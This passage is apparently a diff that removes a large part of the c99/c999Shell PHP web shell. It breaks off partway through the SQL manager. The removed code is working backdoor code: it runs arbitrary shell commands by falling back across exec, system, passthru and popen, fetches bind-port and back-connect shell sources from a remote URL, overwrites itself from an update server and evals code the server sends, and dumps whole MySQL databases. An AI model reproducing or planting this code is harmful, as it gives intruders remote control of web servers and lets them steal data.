-  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

-  else {$size = $size . " B";}

-  return $size;

- }

-}

-}

-if (!function_exists("fs_copy_dir"))

-{

-function fs_copy_dir($d,$t)

-{

- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

- $h = opendir($d);

- while (($o = readdir($h)) !== FALSE)

- {

-  if (($o != ".") and ($o != ".."))

-  {

-   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

-   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

-   if (!$ret) {return $ret;}

-  }

- }

- closedir($h);

- return TRUE;

-}

-}

-if (!function_exists("fs_copy_obj"))

-{

-function fs_copy_obj($d,$t)

-{

- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

- $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);

- if (!is_dir(dirname($t))) {mkdir(dirname($t));}

- if (is_dir($d))

- {

-  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

-  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}

-  return fs_copy_dir($d,$t);

- }

- elseif (is_file($d)) {return copy($d,$t);}

- else {return FALSE;}

-}

-}

-if (!function_exists("fs_move_dir"))

-{

-function fs_move_dir($d,$t)

-{

- $h = opendir($d);

- if (!is_dir($t)) {mkdir($t);}

- while (($o = readdir($h)) !== FALSE)

- {

-  if (($o != ".") and ($o != ".."))

-  {

-   $ret = TRUE;

-   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

-   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}

-   if (!$ret) {return $ret;}

-  }

- }

- closedir($h);

- return TRUE;

-}

-}

-if (!function_exists("fs_move_obj"))

-{

-function fs_move_obj($d,$t)

-{

- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

- $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);

- if (is_dir($d))

- {

-  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

-  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}

-  return fs_move_dir($d,$t);

- }

- elseif (is_file($d))

- {

-  if(copy($d,$t)) {return unlink($d);}

-  else {unlink($t); return FALSE;}

- }

- else {return FALSE;}

-}

-}

-if (!function_exists("fs_rmdir"))

-{

-function fs_rmdir($d)

-{

- $h = opendir($d);

- while (($o = readdir($h)) !== FALSE)

- {

-  if (($o != ".") and ($o != ".."))

-  {

-   if (!is_dir($d.$o)) {unlink($d.$o);}

-   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}

-  }

- }

- closedir($h);

- rmdir($d);

- return !is_dir($d);

-}

-}

-if (!function_exists("fs_rmobj"))

-{

-function fs_rmobj($o)

-{

- $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);

- if (is_dir($o))

- {

-  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}

-  return fs_rmdir($o);

- }

- elseif (is_file($o)) {return unlink($o);}

- else {return FALSE;}

-}

-}

-if (!function_exists("myshellexec"))

-{

-function myshellexec($cmd)

-{

- global $disablefunc;

- $result = "";

- if (!empty($cmd))

- {

-  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}

-  elseif (($result = `$cmd`) !== FALSE) {}

-  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

-  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

-  elseif (is_resource($fp = popen($cmd,"r")))

-  {

-   $result = "";

-   while(!feof($fp)) {$result .= fread($fp,1024);}

-   pclose($fp);

-  }

- }

- return $result;

-}

-}

-if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}

-if (!function_exists("view_perms"))

-{

-function view_perms($mode)

-{

- if (($mode & 0xC000) === 0xC000) {$type = "s";}

- elseif (($mode & 0x4000) === 0x4000) {$type = "d";}

- elseif (($mode & 0xA000) === 0xA000) {$type = "l";}

- elseif (($mode & 0x8000) === 0x8000) {$type = "-";}

- elseif (($mode & 0x6000) === 0x6000) {$type = "b";}

- elseif (($mode & 0x2000) === 0x2000) {$type = "c";}

- elseif (($mode & 0x1000) === 0x1000) {$type = "p";}

- else {$type = "?";}

-

- $owner["read"] = ($mode & 00400)?"r":"-";

- $owner["write"] = ($mode & 00200)?"w":"-";

- $owner["execute"] = ($mode & 00100)?"x":"-";

- $group["read"] = ($mode & 00040)?"r":"-";

- $group["write"] = ($mode & 00020)?"w":"-";

- $group["execute"] = ($mode & 00010)?"x":"-";

- $world["read"] = ($mode & 00004)?"r":"-";

- $world["write"] = ($mode & 00002)? "w":"-";

- $world["execute"] = ($mode & 00001)?"x":"-";

-

- if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}

- if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}

- if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}

-

- return $type.join("",$owner).join("",$group).join("",$world);

-}

-}

-if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}

-if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}

-if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}

-if (!function_exists("parse_perms"))

-{

-function parse_perms($mode)

-{

- if (($mode & 0xC000) === 0xC000) {$t = "s";}

- elseif (($mode & 0x4000) === 0x4000) {$t = "d";}

- elseif (($mode & 0xA000) === 0xA000) {$t = "l";}

- elseif (($mode & 0x8000) === 0x8000) {$t = "-";}

- elseif (($mode & 0x6000) === 0x6000) {$t = "b";}

- elseif (($mode & 0x2000) === 0x2000) {$t = "c";}

- elseif (($mode & 0x1000) === 0x1000) {$t = "p";}

- else {$t = "?";}

- $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;

- $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;

- $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;

- return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);

-}

-}

-if (!function_exists("parsesort"))

-{

-function parsesort($sort)

-{

- $one = intval($sort);

- $second = substr($sort,-1);

- if ($second != "d") {$second = "a";}

- return array($one,$second);

-}

-}

-if (!function_exists("view_perms_color"))

-{

-function view_perms_color($o)

-{

- if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}

- elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}

- else {return "<font color=green>".view_perms(fileperms($o))."</font>";}

-}

-}

-if (!function_exists("c999getsource"))

-{

-function c999getsource($fn)

-{

- global $c999sh_sourcesurl;

- $array = array(

-  "c999sh_bindport.pl" => "c999sh_bindport_pl.txt",

-  "c999sh_bindport.c" => "c999sh_bindport_c.txt",

-  "c999sh_backconn.pl" => "c999sh_backconn_pl.txt",

-  "c999sh_backconn.c" => "c999sh_backconn_c.txt",

-  "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt",

-  "c999sh_datapipe.c" => "c999sh_datapipe_c.txt",

- );

- $name = $array[$fn];

- if ($name) {return file_get_contents($c999sh_sourcesurl.$name);}

- else {return FALSE;}

-}

-}

-if (!function_exists("c999sh_getupdate"))

-{

-function c999sh_getupdate($update = TRUE)

-{return "Can't connect to update-server!";

-

- $url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";

- $data = @file_get_contents($url);

- if (!$data) {return "Can't connect to update-server!";}

- else

- {

-  $data = ltrim($data);

-  $string = substr($data,3,ord($data{2}));

-  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}

-  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}

-  if ($data{0} == "\x99" and $data{1} == "\x03")

-  {

-   $string = explode("\x01",$string);

-   if ($update)

-   {

-    $confvars = array();

-    $sourceurl = $string[0];

-    $source = file_get_contents($sourceurl);

-    if (!$source) {return "Can't fetch update!";}

-    else

-    {

-     $fp = fopen(__FILE__,"w");

-     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}

-     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}

-    }

-   }

-   else {return "New version are available: ".$string[1];}

-  }

-  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}

-  else {return "Error in protocol: segmentation failed! (".$data.") ";}

- }

-}

-}

-if (!function_exists("mysql_dump"))

-{

-function mysql_dump($set)

-{

- global $shver;

- $sock = $set["sock"];

- $db = $set["db"];

- $print = $set["print"];

- $nl2br = $set["nl2br"];

- $file = $set["file"];

- $add_drop = $set["add_drop"];

- $tabs = $set["tabs"];

- $onlytabs = $set["onlytabs"];

- $ret = array();

- $ret["err"] = array();

- if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}

- if (empty($db)) {$db = "db";}

- if (empty($print)) {$print = 0;}

- if (empty($nl2br)) {$nl2br = 0;}

- if (empty($add_drop)) {$add_drop = TRUE;}

- if (empty($file))

- {

-  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";

- }

- if (!is_array($tabs)) {$tabs = array();}

- if (empty($add_drop)) {$add_drop = TRUE;}

- if (sizeof($tabs) == 0)

- {

-  // retrive tables-list

-  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);

-  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}

- }

- $out = "# Dumped by c999Shell.SQL v. ".$shver."

-# Home page: http://ccteam.ru

-#

-# Host settings:

-# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."

-# Date: ".date("d.m.Y H:i:s")."

-# DB: \"".$db."\"

-#---------------------------------------------------------

-";

- $c = count($onlytabs);

- foreach($tabs as $tab)

- {

-  if ((in_array($tab,$onlytabs)) or (!$c))

-  {

-   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}

-   // recieve query for create table structure

-   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);

-   if (!$res) {$ret["err"][] = mysql_smarterror();}

-   else

-   {

-    $row = mysql_fetch_row($res);

-    $out .= $row["1"].";\n\n";

-    // recieve table variables

-    $res = mysql_query("SELECT * FROM `$tab`", $sock);

-    if (mysql_num_rows($res) > 0)

-    {

-     while ($row = mysql_fetch_assoc($res))

-     {

-      $keys = implode("`, `", array_keys($row));

-      $values = array_values($row);

-      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}

-      $values = implode("', '", $values);

-      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";

-      $out .= $sql;

-     }

-    }

-   }

-  }

- }

- $out .= "#---------------------------------------------------------------------------------\n\n";

- if ($file)

- {

-  $fp = fopen($file, "w");

-  if (!$fp) {$ret["err"][] = 2;}

-  else

-  {

-   fwrite ($fp, $out);

-   fclose ($fp);

-  }

- }

- if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}

- return $out;

-}

-}

-if (!function_exists("mysql_buildwhere"))

-{

-function mysql_buildwhere($array,$sep=" and",$functs=array())

-{

- if (!is_array($array)) {$array = array();}

- $result = "";

- foreach($array as $k=>$v)

- {

-  $value = "";

-  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}

-  $value .= "'".addslashes($v)."'";

-  if (!empty($functs[$k])) {$value .= ")";}

-  $result .= "`".$k."` = ".$value.$sep;

- }

- $result = substr($result,0,strlen($result)-strlen($sep));

- return $result;

-}

-}

-if (!function_exists("mysql_fetch_all"))

-{

-function mysql_fetch_all($query,$sock)

-{

- if ($sock) {$result = mysql_query($query,$sock);}

- else {$result = mysql_query($query);}

- $array = array();

- while ($row = mysql_fetch_array($result)) {$array[] = $row;}

- mysql_free_result($result);

- return $array;

-}

-}

-if (!function_exists("mysql_smarterror"))

-{

-function mysql_smarterror($type,$sock)

-{

- if ($sock) {$error = mysql_error($sock);}

- else {$error = mysql_error();}

- $error = htmlspecialchars($error);

- return $error;

-}

-}

-if (!function_exists("mysql_query_form"))

-{

-function mysql_query_form()

-{

- global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;

- if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}

- if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}

- if ((!$submit) or ($sql_act))

- {

-  echo "<table border=0><tr><td><form name=\"c999sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";

-  if ($tbl_struct)

-  {

-   echo "<td valign=\"top\"><b>Fields:</b><br>";

-   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c999sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}

-   echo "</td></tr></table>";

-  }

- }

- if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}

-}

-}

-if (!function_exists("mysql_create_db"))

-{

-function mysql_create_db($db,$sock="")

-{

- $sql = "CREATE DATABASE `".addslashes($db)."`;";

- if ($sock) {return mysql_query($sql,$sock);}

- else {return mysql_query($sql);}

-}

-}

-if (!function_exists("mysql_query_parse"))

-{

-function mysql_query_parse($query)

-{

- $query = trim($query);

- $arr = explode (" ",$query);

- /*array array()

- {

-  "METHOD"=>array(output_type),

-  "METHOD1"...

-  ...

- }

- if output_type == 0, no output,

- if output_type == 1, no output if no error

- if output_type == 2, output without control-buttons

- if output_type == 3, output with control-buttons

- */

- $types = array(

-  "SELECT"=>array(3,1),

-  "SHOW"=>array(2,1),

-  "DELETE"=>array(1),

-  "DROP"=>array(1)

- );

- $result = array();

- $op = strtoupper($arr[0]);

- if (is_array($types[$op]))

- {

-  $result["propertions"] = $types[$op];

-  $result["query"]  = $query;

-  if ($types[$op] == 2)

-  {

-   foreach($arr as $k=>$v)

-   {

-    if (strtoupper($v) == "LIMIT")

-    {

-     $result["limit"] = $arr[$k+1];

-     $result["limit"] = explode(",",$result["limit"]);

-     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}

-     unset($arr[$k],$arr[$k+1]);

-    }

-   }

-  }

- }

- else {return FALSE;}

-}

-}

-if (!function_exists("c999fsearch"))

-{

-function c999fsearch($d)

-{

- global $found;

- global $found_d;

- global $found_f;

- global $search_i_f;

- global $search_i_d;

- global $a;

- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

- $h = opendir($d);

- while (($f = readdir($h)) !== FALSE)

- {

-  if($f != "." && $f != "..")

-  {

-   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));

-   if (is_dir($d.$f))

-   {

-    $search_i_d++;

-    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}

-    if (!is_link($d.$f)) {c999fsearch($d.$f);}

-   }

-   else

-   {

-    $search_i_f++;

-    if ($bool)

-    {

-     if (!empty($a["text"]))

-     {

-      $r = @file_get_contents($d.$f);

-      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}

-      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}

-      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}

-      else {$bool = strpos(" ".$r,$a["text"],1);}

-      if ($a["text_not"]) {$bool = !$bool;}

-      if ($bool) {$found[] = $d.$f; $found_f++;}

-     }

-     else {$found[] = $d.$f; $found_f++;}

-    }

-   }

-  }

- }

- closedir($h);

-}

-}

-if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}

-//Sending headers

-@ob_start();

-@ob_implicit_flush(0);

-function onphpshutdown()

-{

- global $gzipencode,$ft;

- if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))

- {

-  $v = @ob_get_contents();

-  @ob_end_clean();

-  @ob_start("ob_gzHandler");

-  echo $v;

-  @ob_end_flush();

- }

-}

-function c999shexit()

-{

- onphpshutdown();

- exit;

-}

-header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");

-header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");

-header("Cache-Control: no-store, no-cache, must-revalidate");

-header("Cache-Control: post-check=0, pre-check=0", FALSE);

-header("Pragma: no-cache");

-if (empty($tmpdir))

-{

- $tmpdir = ini_get("upload_tmp_dir");

- if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}

-}

-$tmpdir = realpath($tmpdir);

-$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);

-if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}

-if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}

-else {$tmpdir_logs = realpath($tmpdir_logs);}

-if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

-{

- $safemode = TRUE;

- $hsafemode = "<font color=red>ON (secure)</font>";

-}

-else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}

-$v = @ini_get("open_basedir");

-if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}

-else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}

-$sort = htmlspecialchars($sort);

-if (empty($sort)) {$sort = $sort_default;}

-$sort[1] = strtolower($sort[1]);

-$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");

-if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}

-$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));

-@ini_set("highlight.bg",$highlight_bg); //FFFFFF

-@ini_set("highlight.comment",$highlight_comment); //#FF8000

-@ini_set("highlight.default",$highlight_default); //#0000BB

-@ini_set("highlight.html",$highlight_html); //#000000

-@ini_set("highlight.keyword",$highlight_keyword); //#007700

-@ini_set("highlight.string",$highlight_string); //#DD0000

-if (!is_array($actbox)) {$actbox = array();}

-$dspact = $act = htmlspecialchars($act);

-$disp_fullpath = $ls_arr = $notls = null;

-$ud = urlencode($d);

-?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>c99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php

-$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

-if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}

-$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

-if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

-$d = str_replace("\\\\","\\",$d);

-$dispd = htmlspecialchars($d);

-$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));

-$i = 0;

-foreach($pd as $b)

-{

- $t = "";

- $j = 0;

- foreach ($e as $r)

- {

-  $t.= $r.DIRECTORY_SEPARATOR;

-  if ($j == $i) {break;}

-  $j++;

- }

- echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";

- $i++;

-}

-echo "&nbsp;&nbsp;&nbsp;";

-if (is_writable($d))

-{

- $wd = TRUE;

- $wdt = "<font color=green>[ ok ]</font>";

- echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";

-}

-else

-{

- $wd = FALSE;

- $wdt = "<font color=red>[ Read-Only ]</font>";

- echo "<b>".view_perms_color($d)."</b>";

-}

-if (is_callable("disk_free_space"))

-{

- $free = disk_free_space($d);

- $total = disk_total_space($d);

- if ($free === FALSE) {$free = 0;}

- if ($total === FALSE) {$total = 0;}

- if ($free < 0) {$free = 0;}

- if ($total < 0) {$total = 0;}

- $used = $total-$free;

- $free_percent = round(100/($total/$free),2);

- echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";

-}

-echo "<br>";

-$letters = "";

-if ($win)

-{

- $v = explode("\\",$d);

- $v = $v[0];

- foreach (range("a","z") as $letter)

- {

-  $bool = $isdiskette = in_array($letter,$safemode_diskettes);

-  if (!$bool) {$bool = is_dir($letter.":\\");}

-  if ($bool)

-  {

-   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";

-   if ($letter.":" != $v) {$letters .= $letter;}

-   else {$letters .= "<font color=green>".$letter."</font>";}

-   $letters .= " ]</a> ";

-  }

- }

- if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}

-}

-if (count($quicklaunch) > 0)

-{

- foreach($quicklaunch as $item)

- {

-  $item[1] = str_replace("%d",urlencode($d),$item[1]);

-  $item[1] = str_replace("%sort",$sort,$item[1]);

-  $v = realpath($d."..");

-  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}

-  $item[1] = str_replace("%upd",urlencode($v),$item[1]);

-  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";

- }

-}

-echo "</p></td></tr></table><br>";

-if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}

-echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";

-if ($act == "") {$act = $dspact = "ls";}

-if ($act == "sql")

-{

- $sql_surl = $surl."act=sql";

- if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}

- if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}

- if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}

- if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}

- if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}

- $sql_surl .= "&";

- ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php

- if ($sql_server)

- {

-  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);

-  $err = mysql_smarterror();

-  @mysql_select_db($sql_db,$sql_sock);

-  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}

- }

- else {$sql_sock = FALSE;}

- echo "<b>SQL Manager:</b><br>";

- if (!$sql_sock)

- {

-  if (!$sql_server) {echo "NO CONNECTION";}

-  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}

- }

- else

- {

-  $sqlquicklaunch = array();

-  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");

-  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));

-  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");

